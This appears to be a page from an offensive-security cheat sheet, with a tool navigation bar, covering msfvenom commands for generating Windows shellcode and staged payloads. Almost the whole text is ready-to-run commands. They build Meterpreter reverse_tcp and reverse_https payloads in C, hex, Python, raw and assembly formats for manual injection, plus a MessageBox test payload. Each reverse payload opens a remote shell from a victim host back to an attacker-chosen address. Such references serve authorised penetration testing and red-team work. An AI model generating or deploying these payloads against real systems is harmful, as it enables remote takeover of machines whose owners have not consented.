🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸ’£ msfvenom / Windows β€” Shellcode & Staged Payloads

Windows β€” Shellcode & Staged Payloads

Shellcode in C format

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f c

Shellcode in hex format

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f hex

Shellcode in Python format

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f python

Shellcode in raw binary

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f raw > payload.bin

Hex + UUID tracking (HTTPS, SSL cert)

msfvenom -p windows/x64/meterpreter_reverse_https \
  lhost=<ip> lport=443 \
  PayloadUUIDTracking=true \
  HandlerSSLCert=ssl.pem \
  PayloadUUIDName=<name> \
  -f hex -o shellcode.hex

Assembly format (for manual injection)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f asm

MessageBox test (verifies exec without network)

msfvenom -p windows/messagebox TEXT="pwned" TITLE="test" -f c